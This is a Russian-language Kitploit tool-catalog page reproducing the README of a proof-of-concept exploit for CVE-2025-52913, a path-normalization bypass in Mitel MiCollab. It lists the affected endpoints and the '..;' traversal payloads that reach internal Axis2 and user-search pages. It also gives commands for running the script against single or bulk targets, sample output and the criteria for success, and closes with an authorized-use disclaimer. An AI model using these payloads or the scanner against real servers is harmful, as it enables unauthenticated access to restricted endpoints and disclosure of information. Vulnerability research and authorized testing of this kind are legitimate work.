Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
PoC-CVE-2025-52913 — Доказательство концепции (PoC) для CVE-2025-52913, уязвимость нормализации пути, затрагивающая Mitel MiCollab. | Kitploit
Инструменты/GitHubGitHub/pgasus99/poc-cve-2025-52913
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubpgasus99/poc-cve-2025-52913

PoC-CVE-2025-52913

Доказательство концепции (PoC) для CVE-2025-52913, уязвимость нормализации пути, затрагивающая Mitel MiCollab.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-52913 - Уязвимость нормализации пути в MiCollab

📌 Обзор

Этот репозиторий содержит доказательство концепции (PoC) для CVE-2025-52913 — уязвимости нормализации пути, затрагивающей Mitel MiCollab.

Проблема позволяет неаутентифицированным злоумышленникам обходить предполагаемые ограничения пути, используя специально созданные последовательности URL, такие как ..;, что приводит к доступу к внутренним конечным точкам приложения.


⚠️ Воздействие

Успешная эксплуатация может позволить:

  • Доступ к внутренним и ограниченным конечным точкам
  • Раскрытие конфиденциальных компонентов приложения
  • Потенциальное разглашение информации

🎯 Затронутые конечные точки

Уязвимость может быть вызвана следующими путями:

root@kitploit:~
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/

💣 Полезные нагрузки

Примеры обходных полезных нагрузок:

root@kitploit:~
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do

🚀 Использование

1. Установка зависимостей

root@kitploit:~
pip install -r requirements.txt

2. Запуск против одной цели

root@kitploit:~
python3 POC-CVE-2025-52913.py example.com

3. Запуск против нескольких целей

root@kitploit:~
python3 POC-CVE-2025-52913.py domains.txt

🧪 Пример

root@kitploit:~
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
    [!] Possible success

🔍 Обнаружение

Цель вероятно уязвима, если:

  • Сервер отвечает с HTTP 200

  • Ответ содержит:

    • Axis2
    • Axis2 Happiness Page
    • Корректный вывод приложения от внутренних конечных точек

🛠️ Технические детали

Уязвимость возникает из-за неправильной нормализации специально созданных путей, содержащих ..;, что позволяет выйти за пределы предполагаемого контекста приложения.

Такое поведение может раскрыть внутренние сервисы, такие как:

  • Интерфейс веб-сервисов Axis2
  • Внутренние конечные точки управления пользователями

👤 Обнаружение

Обнаружено Dahmani Toumi


📚 Ссылки

  • CVE: CVE-2025-52913
  • (Добавьте уведомление поставщика или ссылку на NVD, когда они станут доступны)

⚖️ Отказ от ответственности

Этот проект предназначен только для образовательных целей и авторизованного тестирования безопасности.

Не используйте этот инструмент против систем без явного разрешения. Автор не несет ответственности за любое неправомерное использование или ущерб.


Скачать инструмент